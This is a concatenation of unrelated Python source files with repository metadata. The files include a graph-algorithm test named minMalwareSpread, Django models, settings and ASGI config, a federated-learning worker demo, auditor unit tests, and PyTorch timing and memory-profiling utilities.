    print(Solution().minMalwareSpread([[1, 1, 1], [1, 1, 1], [1, 1, 1]], [1, 2]))
    print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1]))
    print(Solution().minMalwareSpread([[1, 0, 0], [0, 1, 0], [0, 0, 1]], [0, 2]))
    print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1, 2]))
    print(Solution().minMalwareSpread([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 1], [0, 0, 1, 1]], [3, 1]))
    print(Solution().minMalwareSpread(
        [[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0], [0, 0, 0, 1, 1, 0],
         [0, 0, 0, 0, 0, 1]], [5, 0]))
"[email protected]"
] | |
77ebbe0d48ff860ba8eab641e85ade6503ca77d9 | f2ab8ccda7203dd37d61facb9978cf74b781c7f1 | /tests/models.py | 2a33a19a5a6c499db6c4c5ca9168a18891a56d61 | [
"MIT"
] | permissive | Apkawa/easy-thumbnails-admin | 1991137224dcd117520b2c114d4012daf803776e | 9d7a38f215cdac53a663b00f1d4ff3a3c2a54eb4 | refs/heads/master | 2021-01-01T15:47:34.334792 | 2017-11-23T10:38:09 | 2017-11-23T10:38:09 | 97,703,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from django.db import models
from easy_thumbnails.fields import ThumbnailerImageField
def upload_to(instance, filename):
    """Build the storage path for an uploaded file under the 'example/' prefix.

    Signature matches Django's upload_to callable contract: the model
    instance is accepted but unused.
    """
    return f'example/{filename}'
class Example(models.Model):
    """Minimal test model exercising easy-thumbnails' image field."""
    # Files are stored under 'example/<filename>' via the module-level
    # upload_to callable.
    image = ThumbnailerImageField(upload_to=upload_to)
| [
"[email protected]"
] | |
139ecc75596912c669b4ed0216a1514922c50a4c | 605611de5eae63ce4eef388a287a3ef18b52eae7 | /CovidCrowd/settings.py | 95d5f1e4b28e5afba1ede23609cd8a48a22b35cd | [] | no_license | RahulAttarde/CovidCrowd | e6b2e45c222f03112c157403c2d6630d888599d8 | 55740e1ea72cd434aed0a627f6fffb16024a6f17 | refs/heads/master | 2021-04-23T00:02:46.726288 | 2020-03-25T02:45:35 | 2020-03-25T02:45:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,879 | py | """
Django settings for CovidCrowd project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config("SECRET_KEY")

# SECURITY WARNING: don't run with debug turned on in production!
# cast=bool is required: decouple returns the raw env string, and any
# non-empty string (including "False") is truthy without the cast.
DEBUG = config("DEBUG", cast=bool)

ALLOWED_HOSTS = config("MY_HOSTS", cast=Csv())


# Application definition

INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "django.contrib.gis",
    "social_django",
    "crispy_forms",
    "patients",
    "rest_framework",
    "django_filters",
    "django_tables2",
    "debug_toolbar",
    "memcache_status",
]

MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
    "social_django.middleware.SocialAuthExceptionMiddleware",
    "debug_toolbar.middleware.DebugToolbarMiddleware",
]

ROOT_URLCONF = "CovidCrowd.urls"

TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
                "social_django.context_processors.backends",
                "social_django.context_processors.login_redirect",
            ],
        },
    },
]

WSGI_APPLICATION = "CovidCrowd.wsgi.application"


# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
# GeoDjango-enabled SQLite backend (spatialite).

DATABASES = {
    "default": {
        "ENGINE": "django.contrib.gis.db.backends.spatialite",
        "NAME": os.path.join(BASE_DIR, "db.sqlite3"),
    }
}

# Social login backends are tried in order before the default model backend.
AUTHENTICATION_BACKENDS = (
    "social_core.backends.github.GithubOAuth2",
    "social_core.backends.twitter.TwitterOAuth",
    "social_core.backends.google.GoogleOAuth2",
    "django.contrib.auth.backends.ModelBackend",
)

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
    },
    {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",},
    {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",},
    {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",},
]


# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/

LANGUAGE_CODE = "en-us"

TIME_ZONE = "Asia/Kolkata"

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/

STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, 'static')

# Crispy forms
CRISPY_TEMPLATE_PACK = "bootstrap4"

# OAUTH for Social Login
LOGIN_URL = "/login-form"
SOCIAL_AUTH_URL_NAMESPACE = "social"
SOCIAL_AUTH_LOGIN_REDIRECT_URL = "/"

SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY")
SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET")

SOCIAL_AUTH_TWITTER_KEY = config("SOCIAL_AUTH_TWITTER_KEY")
SOCIAL_AUTH_TWITTER_SECRET = config("SOCIAL_AUTH_TWITTER_SECRET")

SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = config("SOCIAL_AUTH_GOOGLE_OAUTH2_KEY")
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = config("SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET")

# Django REST Framework
REST_FRAMEWORK = {
    # Use Django's standard `django.contrib.auth` permissions,
    # or allow read-only access for unauthenticated users.
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
    ]
}

CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': '127.0.0.1:11211',
    }
}

# Hosts allowed to see the debug toolbar.
INTERNAL_IPS = [
    '127.0.0.1',
]
"[email protected]"
] | |
e1752708a0af5efe19acf9209a0dd0734303fa0d | 840b98f14f181f7dbd693f2ee4b3c46e5be59305 | /demos/demo_pycloudmessenger/POM2/NeuralNetworks/pom2_NN_worker_pycloudmessenger.py | 672126432edb472a87502a57beff578247d9307a | [
"Apache-2.0"
] | permissive | Musketeer-H2020/MMLL-Robust | 4ef6b2ff5dff18d4d2b2a403a89d9455ba861e2b | ccc0a7674a04ae0d00bedc38893b33184c5f68c6 | refs/heads/main | 2023-09-01T18:47:46.065297 | 2021-09-28T15:34:12 | 2021-09-28T15:34:12 | 386,264,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,614 | py | # -*- coding: utf-8 -*-
'''
@author: Marcos Fernandez Diaz
November 2020
Example of use: python pom2_NN_worker_pycloudmessenger.py --user <user> --password <password> --task_name <task_name> --id <id>
Parameters:
- user: String with the name of the user. If the user does not exist in the pycloudmessenger platform a new one will be created
- password: String with the password
- task_name: String with the name of the task. If the task already exists, an error will be displayed
- id: Integer representing the partition of data to be used by the worker. Each worker should use a different partition, possible values are 0 to 4.
'''
# Import general modules
import argparse
import logging
import json
import numpy as np
import sys, os
# Must be set BEFORE importing tensorflow to take effect.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Disables tensorflow warnings
import tensorflow as tf
import onnxruntime

# Add higher directory to python modules path.
sys.path.append("../../../../")

# To be imported from MMLL (pip installed)
from MMLL.nodes.WorkerNode import WorkerNode
from MMLL.comms.comms_pycloudmessenger import Comms_worker as Comms

# To be imported from demo_tools
from demo_tools.task_manager_pycloudmessenger import Task_Manager
from demo_tools.data_connectors.Load_from_file import Load_From_File as DC
from demo_tools.mylogging.logger_v1 import Logger
from demo_tools.evaluation_tools import display, plot_cm_seaborn, create_folders
# Set up logger: quiet by default at the handler level, but the root
# logger itself accepts DEBUG records.
logging.basicConfig(
    level=logging.ERROR,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S')
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
if __name__ == "__main__":
    # ---- command-line arguments -------------------------------------------
    parser = argparse.ArgumentParser()
    parser.add_argument('--user', type=str, default=None, help='User')
    parser.add_argument('--password', type=str, default=None, help='Password')
    parser.add_argument('--task_name', type=str, default=None, help='Name of the task')
    parser.add_argument('--id', type=int, default=None, choices=[0, 1, 2, 3, 4], help='The data partition of the worker')

    FLAGS, unparsed = parser.parse_known_args()
    user_name = FLAGS.user
    user_password = FLAGS.password
    task_name = FLAGS.task_name
    data_partition_id = FLAGS.id  # This integer identifies the data partition used for the worker

    # Set basic configuration
    dataset_name = 'mnist'
    verbose = False
    pom = 2
    model_type = 'NN'

    # Create the directories for storing relevant outputs if they do not exist
    create_folders("./results/")

    # Setting up the logger
    logger = Logger('./results/logs/Worker_' + str(user_name) + '.log')

    # Load credentials file to use pycloudmessenger
    # Note: this part creates the task and waits for the workers to join. This code is intended to be used only at the demos, in Musketeer this part must be done in the client.
    display('===========================================', logger, verbose)
    credentials_filename = '../../musketeer.json'
    try:
        with open(credentials_filename, 'r') as f:
            credentials = json.load(f)
    # NOTE(review): bare except swallows every error (not just a missing
    # file) and exits with a misleading message.
    except:
        display('Error - The file musketeer.json is not available, please put it under the following path: "' + os.path.abspath(os.path.join("","../../")) + '"', logger, verbose)
        sys.exit()

    # Create user and join the task
    tm = Task_Manager(credentials_filename)
    participant = tm.create_worker_and_join_task(user_name, user_password, task_name, display, logger)

    # Creating the comms object
    display('Creating WorkerNode under POM %d, communicating through pycloudmessenger' %pom, logger, verbose)
    comms = Comms(participant, user_name)

    # Creating Workernode
    wn = WorkerNode(pom, comms, logger, verbose)
    display('-------------------- Loading dataset %s --------------------------' % dataset_name, logger, verbose)

    # Load data
    # Warning: this data connector is only designed for the demos. In Musketeer, appropriate data
    # connectors must be provided
    data_file = '../../../../input_data/' + dataset_name + '_demonstrator_data.pkl'
    try:
        dc = DC(data_file)
    # NOTE(review): bare except -- same caveat as above.
    except:
        display('Error - The file ' + dataset_name + '_demonstrator_data.pkl does not exist. Please download it from Box and put it under the following path: "' + os.path.abspath(os.path.join("","../../../../input_data/")) + '"', logger, verbose)
        sys.exit()

    # Get train/test data and set training data
    [Xtr, ytr, _, _, Xtst, ytst] = dc.get_all_data_Worker(int(data_partition_id))
    wn.set_training_data(dataset_name, Xtr, ytr)
    display('WorkerNode loaded %d patterns for training' % wn.NPtr, logger, verbose)

    # Creating a ML model and start training procedure (blocks until the
    # federated training protocol finishes)
    wn.create_model_worker(model_type)
    display('MMLL model %s is ready for training!' %model_type, logger, verbose)
    display('Worker_' + model_type + ' %s is running...' %user_name, logger, verbose)
    wn.run()
    display('Worker_' + model_type + ' %s: EXIT' %user_name, logger, verbose)

    # Retrieving and saving the trained model
    display('Retrieving the trained model from WorkerNode', logger, verbose)
    model = wn.get_model()

    # Warning: this save_model utility is only for demo purposes
    output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model'
    model.save(output_filename_model)

    # Making predictions on test data
    display('------------- Obtaining predictions------------------------------------\n', logger, verbose)
    preprocessors = wn.get_preprocessors()
    if preprocessors is not None:
        for prep_model in preprocessors: # Apply stored preprocessor sequentially (in the same order received)
            Xtst = prep_model.transform(Xtst)
            display('Test data transformed using %s' %prep_model.name, logger, verbose)
    preds_tst = model.predict(Xtst)
    preds_tst = np.argmax(preds_tst, axis=-1) # Labels
    y = np.argmax(ytst, axis=-1) # Convert to labels
    classes = np.arange(ytst.shape[1]) # 0 to 9

    # Evaluating the results
    display('------------- Evaluating --------------------------------------------\n', logger, verbose)
    # Warning, these evaluation methods are not part of the MMLL library, they are only intended to be used for the demos. Use them at your own risk.
    output_filename = 'Worker_' + str(user_name) + '_NN_confusion_matrix_' + dataset_name + '.png'
    title = 'NN confusion matrix in test set worker'
    plot_cm_seaborn(preds_tst, y, classes, title, output_filename, logger, verbose, normalize=True)

    # Load Tf SavedModel and check results
    model_loaded = tf.keras.models.load_model(output_filename_model)
    preds_tst = model_loaded.predict(Xtst)
    preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels

    # Model export to ONXX
    output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model.onnx'
    model.save(output_filename_model)

    # Compute the prediction with ONNX Runtime and compare against the
    # TF predictions (mean squared difference of the label vectors).
    onnx_session = onnxruntime.InferenceSession(output_filename_model)
    onnx_inputs = {onnx_session.get_inputs()[0].name: Xtst}
    onnx_output = onnx_session.run(None, onnx_inputs)[0]
    onnx_output = np.argmax(onnx_output, axis=-1) # Convert to labels
    err_onnx = np.mean((preds_tst.ravel() - onnx_output.ravel())**2)
    display('Error in ONNX predictions is %f' %err_onnx, logger, verbose)
"[email protected]"
] | |
f327656c3c6c957763b8883c4183d103b33e956c | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_linking.py | 619af3537e5435c213053702bea9f7364b783fca | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py |
from xai.brain.wordbase.verbs._link import _LINK
# class header
class _LINKING(_LINK):
    """Verb entry for "linking", derived from the base verb "link"."""

    def __init__(self):
        super().__init__()
        self.name = "LINKING"
        self.specie = 'verbs'
        self.basic = "link"
        self.jsondata = {}
| [
"[email protected]"
] | |
e2e0a5e05ade4bf1b990a627802943af3a19626d | f5c7d50973d47abd555502470b300b3c70af9fa5 | /voting/asgi.py | 856ae28db6db7b31736db9f3585a818ef2de5cc0 | [
"MIT"
] | permissive | jess-monter/voting_back | 62b67fafcfa8a9b7feebbca463c5055efdff7d98 | de54218f01095f5090d490cabf32a86b1e608925 | refs/heads/main | 2023-04-06T16:00:45.066076 | 2021-04-14T07:51:10 | 2021-04-14T07:51:10 | 336,810,613 | 0 | 0 | MIT | 2021-04-14T07:51:11 | 2021-02-07T14:46:05 | Python | UTF-8 | Python | false | false | 756 | py | """
ASGI config for voting project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "voting.settings")
django_asgi_app = get_asgi_application()
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
import voting.apps.notifications.routing
application = ProtocolTypeRouter(
{
"http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(voting.apps.notifications.routing.websocket_urlpatterns)
),
}
)
| [
"="
] | = |
78430575c8a6091691a2baff513bfbe12212aa04 | e8805bf7c79da1b63d36c3535b8f5ba7d97b6b56 | /tests/test_auditor/test_auditor_bookmark.py | 05eaeea64b067419856d25819c257ca50d667dd1 | [
"MIT"
] | permissive | wbuchwalter/polyaxon | 9ad681e37065e8aa05741fb7d63b170e4c1fdfe6 | a01396ea86a74082c457bfbc2c91d283b6ff6fba | refs/heads/master | 2020-03-23T08:34:42.248328 | 2018-07-17T18:29:06 | 2018-07-17T18:29:06 | 141,334,939 | 0 | 0 | MIT | 2018-07-17T19:35:22 | 2018-07-17T19:35:21 | null | UTF-8 | Python | false | false | 2,819 | py | # pylint:disable=ungrouped-imports
from unittest.mock import patch
import pytest
import activitylogs
import auditor
import tracker
from event_manager.events import bookmark as bookmarks_events
from tests.utils import BaseTest
@pytest.mark.auditor_mark
class AuditorBookmarksTest(BaseTest):
"""Testing subscribed events"""
DISABLE_RUNNER = False
def setUp(self):
auditor.validate()
auditor.setup()
tracker.validate()
tracker.setup()
activitylogs.validate()
activitylogs.setup()
super().setUp()
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_build_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_BUILD_JOBS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_job_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_JOBS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENTS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_group_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENT_GROUPS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_project_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_PROJECTS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
| [
"[email protected]"
] | |
c3f387488e18415441d92be7b503abfd69d40ad1 | 8e97cb7c8668a9061683ea3ba893dab32029fac9 | /pytorch_toolkit/instance_segmentation/segmentoly/utils/profile.py | 9c17d0e496ee59a819333e28ce8963262200b8d3 | [
"Apache-2.0"
] | permissive | DmitriySidnev/openvino_training_extensions | e01703bea292f11ffc20d50a1a06f0565059d5c7 | c553a56088f0055baba838b68c9299e19683227e | refs/heads/develop | 2021-06-14T06:32:12.373813 | 2020-05-13T13:25:15 | 2020-05-13T13:25:15 | 180,546,423 | 0 | 1 | Apache-2.0 | 2019-04-15T13:39:48 | 2019-04-10T09:17:55 | Python | UTF-8 | Python | false | false | 14,154 | py | """
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import gc
import operator as op
import time
from collections import defaultdict
from functools import reduce, wraps
import numpy as np
import torch
class Timer(object):
def __init__(self, warmup=0, smoothing=0.5, cuda_sync=True):
self.warmup = warmup
self.cuda_sync = cuda_sync
self.total_time = 0.
self.calls = 0
self.start_time = 0.
self.diff = 0.
self.average_time = 0.
self.smoothed_time = 0.
self.smoothing_alpha = smoothing
self.min_time = float('inf')
self.max_time = 0.
self.reset()
def tic(self):
if self.cuda_sync and torch.cuda.is_available():
torch.cuda.synchronize()
self.start_time = time.time()
def toc(self, average=True, smoothed=False):
if self.cuda_sync and torch.cuda.is_available():
torch.cuda.synchronize()
self.diff = time.time() - self.start_time
self.calls += 1
if self.calls <= self.warmup:
return self.diff
self.total_time += self.diff
self.average_time = self.total_time / (self.calls - self.warmup)
self.smoothed_time = self.smoothed_time * self.smoothing_alpha + self.diff * (1.0 - self.smoothing_alpha)
self.min_time = min(self.min_time, self.diff)
self.max_time = max(self.max_time, self.diff)
if average:
return self.average_time
elif smoothed:
return self.smoothed_time
else:
return self.diff
def __enter__(self):
self.tic()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.toc()
def reset(self):
self.total_time = 0.
self.calls = 0
self.start_time = 0.
self.diff = 0.
self.average_time = 0.
class DummyTimer(Timer):
def __init__(self):
super().__init__()
def tic(self):
pass
def toc(self, *args, **kwargs):
return 0
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def timed(func):
@wraps(func)
def wrapper_timer(self, *args, **kwargs):
if not hasattr(self, '_timers'):
self._timers = defaultdict(Timer)
with self._timers[func.__name__]:
value = func(self, *args, **kwargs)
return value
return wrapper_timer
def print_timing_stats(timers, key='average_time'):
print('{:>40}: {:>10} [{:>10}, {:>10}] {:>10} {:>10}'.format('name', 'average', 'min', 'max', '#calls', 'total'))
for k, v in sorted(timers.items(), key=lambda x: op.attrgetter(key)(x[1]), reverse=True):
print('{:>40}: {:10.2f} [{:10.2f}, {:10.2f}] {:10d} {:10.2f}'.format(k, 1000 * v.average_time,
1000 * v.min_time, 1000 * v.max_time,
v.calls, 1000 * v.total_time))
print('-' * 40)
def pretty_shape(shape):
if shape is None:
return 'None'
return '×'.join(map(str, shape))
def pretty_size(size, units='G', precision=2, base=1024):
if units is None:
if size // (base ** 3) > 0:
val = str(round(size / (base ** 3), precision))
units = 'G'
elif size // (base ** 2) > 0:
val = str(round(size / (base ** 2), precision))
units = 'M'
elif size // base > 0:
val = str(round(size / base, precision))
units = 'K'
else:
val = str(size)
units = ''
else:
if units == 'G':
val = str(round(size / (base ** 3), precision))
elif units == 'M':
val = str(round(size / (base ** 2), precision))
elif units == 'K':
val = str(round(size / base, precision))
else:
val = str(size)
return val, units
def dump_tensors(gpu_only=True):
"""Prints a list of the Tensors being tracked by the garbage collector."""
total_size = 0
for obj in gc.get_objects():
try:
if torch.is_tensor(obj):
if not gpu_only or obj.is_cuda:
print('%s:%s%s %s' % (type(obj).__name__,
' GPU' if obj.is_cuda else '',
' pinned' if obj.is_pinned else '',
pretty_shape(obj.size())))
total_size += obj.numel()
elif hasattr(obj, 'data') and torch.is_tensor(obj.data):
if not gpu_only or obj.is_cuda:
print('%s → %s:%s%s%s%s %s' % (type(obj).__name__,
type(obj.data).__name__,
' GPU' if obj.is_cuda else '',
' pinned' if obj.data.is_pinned else '',
' grad' if obj.requires_grad else '',
' volatile' if obj.volatile else '',
pretty_shape(obj.data.size())))
total_size += obj.data.numel()
except Exception as e:
pass
print('Total size:', total_size)
def list_allocated_tensors():
memtable = []
for obj in gc.get_objects():
if torch.is_tensor(obj):
memtable.append(dict(obj=obj,
size=(reduce(op.mul, obj.size())
if len(obj.size()) > 0
else 0) * obj.element_size()))
memtable = sorted(memtable, key=op.itemgetter('size'))
for i, item in enumerate(memtable):
obj = item['obj']
print('{:03}: {:>10} {:>30} {:>25} {:>10}'.format(i, item['size'], str(np.array(obj.shape)),
str(obj.type()), str(obj.device)))
def list_parameters(module):
memtable = []
for name, x in module.named_parameters():
memtable.append(dict(name=name,
shape=np.array(x.data.shape),
size=int(x.data.numel() * x.data.element_size()),
has_grad=x.requires_grad,
grad_shape=np.array(x.grad.shape) if x.requires_grad else None,
grad_size=int(x.grad.numel() * x.grad.element_size()) if x.requires_grad else 0
)
)
total_data_size = 0
total_grad_size = 0
for i, item in enumerate(memtable):
print('{:03} {:>60}: {:>15} {:>15} {:>15} {:>15}'.format(i,
item['name'],
pretty_size(item['size'], units='M')[0],
pretty_shape(item['shape']),
pretty_size(item['grad_size'], units='M')[0],
pretty_shape(item['grad_shape'])))
total_data_size += item['size']
total_grad_size += item['grad_size']
total_mem_size = list(pretty_size(total_data_size)) + list(pretty_size(total_grad_size))
print('TOTAL MEMORY USAGE FOR MODEL PARAMETERS: data: {} {}B grad: {} {}B'.format(*total_mem_size))
class FeatureMapsTracer(object):
fwd_tensors_registry = set()
bwd_tensors_registry = set()
@staticmethod
def reset(*args, **kwargs):
FeatureMapsTracer.summary_fwd()
FeatureMapsTracer.summary_bwd()
del FeatureMapsTracer.fwd_tensors_registry
FeatureMapsTracer.fwd_tensors_registry = set()
del FeatureMapsTracer.bwd_tensors_registry
FeatureMapsTracer.bwd_tensors_registry = set()
@staticmethod
def summary_fwd(*args, **kwargs):
total_data_size = FeatureMapsTracer.get_total_size(list(FeatureMapsTracer.fwd_tensors_registry))
print('TOTAL FORWARD DATA BLOBS SIZE: {} {}B'.format(*pretty_size(total_data_size)))
@staticmethod
def summary_bwd(*args, **kwargs):
total_data_size = FeatureMapsTracer.get_total_size(list(FeatureMapsTracer.bwd_tensors_registry))
print('TOTAL BACKWARD GRAD BLOBS SIZE: {} {}B'.format(*pretty_size(total_data_size)))
@staticmethod
def list_tensors(x):
tensors = []
if isinstance(x, (list, tuple)):
for i in x:
tensors.extend(FeatureMapsTracer.list_tensors(i))
elif isinstance(x, dict):
for i in x.values():
tensors.extend(FeatureMapsTracer.list_tensors(i))
elif isinstance(x, torch.Tensor):
tensors.append(x)
return tensors
@staticmethod
def get_shapes(tensors):
shapes = [x.shape for x in tensors]
return shapes
@staticmethod
def shapes_to_str(shapes):
return '[' + ', '.join([pretty_shape(shape) for shape in shapes]) + ']'
@staticmethod
def get_total_size(tensors):
total_size = 0
for x in tensors:
total_size += int(x.numel() * x.element_size())
return total_size
@staticmethod
def forward(module, inputs, outputs, verbose=False):
input_tensors = FeatureMapsTracer.list_tensors(inputs)
inputs_shapes = FeatureMapsTracer.get_shapes(input_tensors)
inputs_shapes_str = FeatureMapsTracer.shapes_to_str(inputs_shapes)
inputs_size = FeatureMapsTracer.get_total_size(input_tensors)
FeatureMapsTracer.fwd_tensors_registry.update(set(input_tensors))
output_tensors = FeatureMapsTracer.list_tensors(outputs)
outputs_shapes = FeatureMapsTracer.get_shapes(output_tensors)
outputs_shapes_str = FeatureMapsTracer.shapes_to_str(outputs_shapes)
outputs_size = FeatureMapsTracer.get_total_size(output_tensors)
FeatureMapsTracer.fwd_tensors_registry.update(set(output_tensors))
if verbose:
print('fwd {:>20}: {:>15} {:>15} {:>15} {:>15}'.format(module._get_name(),
pretty_size(inputs_size, units='M')[0],
inputs_shapes_str,
pretty_size(outputs_size, units='M')[0],
outputs_shapes_str))
@staticmethod
def backward(module, inputs, outputs, verbose=False):
input_tensors = FeatureMapsTracer.list_tensors(inputs)
inputs_shapes = FeatureMapsTracer.get_shapes(input_tensors)
inputs_shapes_str = FeatureMapsTracer.shapes_to_str(inputs_shapes)
inputs_size = FeatureMapsTracer.get_total_size(input_tensors)
FeatureMapsTracer.bwd_tensors_registry.update(set(input_tensors))
output_tensors = FeatureMapsTracer.list_tensors(outputs)
outputs_shapes = FeatureMapsTracer.get_shapes(output_tensors)
outputs_shapes_str = FeatureMapsTracer.shapes_to_str(outputs_shapes)
outputs_size = FeatureMapsTracer.get_total_size(output_tensors)
FeatureMapsTracer.bwd_tensors_registry.update(set(output_tensors))
if verbose:
print('bwd {:>20}: {:>15} {:>15} {:>15} {:>15}'.format(module._get_name(),
pretty_size(inputs_size, units='M')[0],
inputs_shapes_str,
pretty_size(outputs_size, units='M')[0],
outputs_shapes_str))
@staticmethod
def add_fwd_hooks(module):
def register_per_layer_hooks(m):
m.register_forward_hook(FeatureMapsTracer.forward)
module.register_forward_pre_hook(FeatureMapsTracer.reset)
module.apply(register_per_layer_hooks)
@staticmethod
def add_bwd_hooks(module):
def register_per_layer_hooks(m):
m.register_backward_hook(FeatureMapsTracer.backward)
module.apply(register_per_layer_hooks)
@staticmethod
def add_hooks(module):
FeatureMapsTracer.add_fwd_hooks(module)
FeatureMapsTracer.add_bwd_hooks(module)
class PerformanceCounters(object):
def __init__(self):
self.pc = {}
def update(self, pc):
for layer, stats in pc.items():
if layer not in self.pc:
self.pc[layer] = dict(layer_type=stats['layer_type'],
exec_type=stats['exec_type'],
status=stats['status'],
real_time=stats['real_time'],
calls=1)
else:
self.pc[layer]['real_time'] += stats['real_time']
self.pc[layer]['calls'] += 1
def print(self):
print('Performance counters:')
print(' '.join(['name', 'layer_type', 'exec_type', 'status', 'real_time(us)']))
for layer, stats in self.pc.items():
print('{} {} {} {} {}'.format(layer, stats['layer_type'], stats['exec_type'],
stats['status'], stats['real_time'] / stats['calls']))
| [
"[email protected]"
] | |
c7d144b8335a423d324ebdc6e7a74ee5f11d99ad | 665455c521cc7cf76c5436337ed545de90976af4 | /cohesity_management_sdk/models/node_port.py | 0160cdc36722ac0df6ecf9ed7e2a96895d226b7a | [
"Apache-2.0"
